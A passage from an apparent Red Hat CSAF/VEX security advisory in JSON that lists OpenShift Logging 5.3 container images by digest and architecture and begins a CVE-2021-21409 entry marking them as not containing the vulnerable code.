"openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "product": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "product_id": "openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-rhel8-operator\u0026tag=v5.3.1-3" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "product": { "name": "openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "product_id": "openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "product_identification_helper": { "purl": "pkg:oci/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-operator-bundle\u0026tag=v5.3.1-12" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "product": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "product_id": "openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "product_identification_helper": { "purl": 
"pkg:oci/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch-proxy-rhel8\u0026tag=v1.0.0-66" } } }, { "category": "product_version", "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "product": { "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "product_id": "openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "product_identification_helper": { "purl": "pkg:oci/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/log-file-metric-exporter-rhel8\u0026tag=v1.0.0-43" } } }, { "category": "product_version", "name": "openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "product": { "name": "openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "product_id": "openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "product_identification_helper": { "purl": "pkg:oci/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/logging-curator5-rhel8\u0026tag=v5.8.1-46" } } }, { "category": "product_version", "name": "openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "product": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "product_id": 
"openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "product_identification_helper": { "purl": "pkg:oci/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/elasticsearch6-rhel8\u0026tag=v6.8.1-65" } } }, { "category": "product_version", "name": "openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "product": { "name": "openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "product_id": "openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "product_identification_helper": { "purl": "pkg:oci/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/eventrouter-rhel8\u0026tag=v0.3.0-63" } } }, { "category": "product_version", "name": "openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "product": { "name": "openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "product_id": "openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "product_identification_helper": { "purl": "pkg:oci/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/fluentd-rhel8\u0026tag=v1.7.4-70" } } }, { "category": "product_version", "name": "openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "product": { "name": 
"openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "product_id": "openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "product_identification_helper": { "purl": "pkg:oci/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0?arch=amd64\u0026repository_url=registry.redhat.io/openshift-logging/kibana6-rhel8\u0026tag=v6.8.1-73" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64 as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64" }, "product_reference": "openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le" }, "product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": 
"openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x" }, "product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64 as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64" }, "product_reference": "openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64 as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64" }, "product_reference": "openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x as a component of OpenShift 
Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x" }, "product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64 as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64" }, "product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le" }, "product_reference": "openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le" }, 
"product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64 as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64" }, "product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x" }, "product_reference": "openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64 as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64" }, "product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64", "relates_to_product_reference": 
"8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x" }, "product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le" }, "product_reference": "openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x" }, "product_reference": "openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64 as a component of OpenShift 
Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64" }, "product_reference": "openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le" }, "product_reference": "openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le" }, "product_reference": "openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x" }, "product_reference": 
"openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64 as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64" }, "product_reference": "openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x" }, "product_reference": "openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le" }, "product_reference": "openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": 
"openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64 as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64" }, "product_reference": "openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le" }, "product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x" }, "product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64 as a component of OpenShift Logging 5.3", "product_id": 
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64" }, "product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le" }, "product_reference": "openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64 as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64" }, "product_reference": "openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x as a component of OpenShift Logging 5.3", "product_id": "8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x" }, "product_reference": 
"openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.3" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-21409", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-03-30T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64", 
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x", "8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64", 